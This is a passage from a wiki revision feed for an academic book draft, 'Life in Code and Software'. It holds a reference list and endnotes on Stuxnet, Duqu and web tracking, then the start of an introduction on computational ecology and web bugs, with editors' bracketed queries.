Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture&amp;amp;nbsp;Desire, ''TechCrunch'',accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress,accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994. The cyber-road not taken. ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about) &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Harraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lunapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. S. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, _The Smithsonian_, accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies and Locally Stored Objects (LSOs) and document object model storage (DOM Storage) &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and the careful analysis of the interal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner with photographs that has been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, and confirmed the importance of the cascade structure, centrifuge layout and the enriching process by careful analysis of the accidental photographing of background images on computers used by the president see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was on 03/02/2010 (Matrosov et al., n.d.). Although there is suspicion that there may be three versions of the Stuxnet code in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] Although there are some criticisms that this link may be spurious, for instance Cryptome (2010) argues: It may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4705</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4705"/>
		<updated>2012-04-18T14:12:45Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such we need to take account of this new computational envornment and think about how today we live in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment, satellites and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which it also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. This [Eds: this is the fourth sentence in this paragraph to begin with 'This'] is a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life is simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], if we had not already discounted and backgrounded its importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, and I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangular squares which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomena of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, but also [Eds: use 'and' instead of 'but also' as these acts are not that different?] send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘State’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour, and collect data and information about users raises important privacy implications, but it also facilitates the rise of so-called behaviour marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code run in the browser without the knowledge of the user, which if it should be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)', the data is not shared with third parties but no information is given on their data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012). [Eds: please check that the single and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becomong extremely profitable. Ghostery 